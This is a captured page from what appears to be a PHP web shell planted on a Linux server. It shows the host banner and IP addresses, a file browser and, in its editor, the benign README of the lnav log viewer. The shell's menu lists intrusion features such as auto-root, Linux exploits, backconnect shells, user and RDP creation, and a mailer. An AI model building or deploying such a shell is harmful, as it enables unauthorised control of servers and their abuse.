Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
lnav-0.7.3 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
233
B
-rw-r--r--
NEWS
9.11
KB
-rw-r--r--
README
1.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
LNAV ---- The log file navigator, lnav, is an enhanced log file viewer that takes advantage of any semantic information that can be gleaned from the files being viewed, such as timestamps and log levels. Using this extra semantic information, lnav can do things like interleaving messages from different files, generate histograms of messages over time, and providing hotkeys for navigating through the file. It is hoped that these features will allow the user to quickly and efficiently zero in on problems. PREREQUISITES ------------- Lnav requires the following software packages: libpcre - The Perl Compatible Regular Expression (PCRE) library. sqlite - The SQLite database engine. ncurses - The ncurses text UI library. readline - The readline line editing library. zlib - The zlib compression library. bz2 - The bzip2 compression library. INSTALLATION ------------ Lnav follows the usual GNU style for configuring and installing software: $ ./configure $ make $ sudo make install USING ----- The only file installed is the executable, "lnav". You can execute it with no arguments to view the default set of files: $ lnav You can view all the syslog messages by running: $ lnav /var/log/messages* SEE ALSO -------- Lnav website: http://lnav.org
Close